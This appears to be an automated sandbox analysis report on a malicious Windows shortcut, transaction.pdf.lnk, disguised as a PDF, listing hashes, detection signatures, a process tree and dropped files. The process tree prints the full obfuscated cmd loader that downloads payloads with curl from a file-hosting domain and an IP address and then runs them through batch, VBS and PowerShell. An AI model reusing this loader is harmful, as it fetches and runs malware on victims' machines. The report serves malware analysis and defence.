Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    10/11/2024, 22:06

General

  • Target

    transaction.pdf.lnk

  • Size

    3KB

  • MD5

    0a2f22c7a16adfe8fbfa67b77edc82b4

  • SHA1

    c2556809eee64ec4061a50d4ea2ee41d6781371f

  • SHA256

    d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb

  • SHA512

    002bb80565514e02834f182f029f5eb0593d22e915aeb6014cf650ef38b93f0a5b8849e7dd766b4099d96025c083b7a0e6790f815e7eec14a5ee2d44ad4dfeac

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2372
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/VORHPBAB/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\System32\cscript.exe
        cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2780
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force
            5⤵
            • Drops file in System32 directory
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2964

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\bat2.bat

          Filesize

          448B

          MD5

          8fa76d0dea5819256a19064f1639b35c

          SHA1

          8dd913107ed46e6df0babd1996c67a65909592b9

          SHA256

          b54a02a81debd9191d15efa77bb915b298f4e7ba1e12638e8fa7280dc8e5b16a

          SHA512

          468fb2dbf989657d9f0d1e39bb0a6213b5021b255c415a53bded8bc240eb49ae261e11c9904b481476dd9cc5f86e69338afd4fd953b46fb3bd294655d3533b48

        • C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

          Filesize

          129B

          MD5

          88c7a65cabaeae2e10cbc7bd5608b28b

          SHA1

          d6ee96710a99d0f65a867c6082148ae7a4981227

          SHA256

          250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543

          SHA512

          b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

        • memory/2964-46-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

          Filesize

          2.9MB

        • memory/2964-47-0x0000000002760000-0x0000000002768000-memory.dmp

          Filesize

          32KB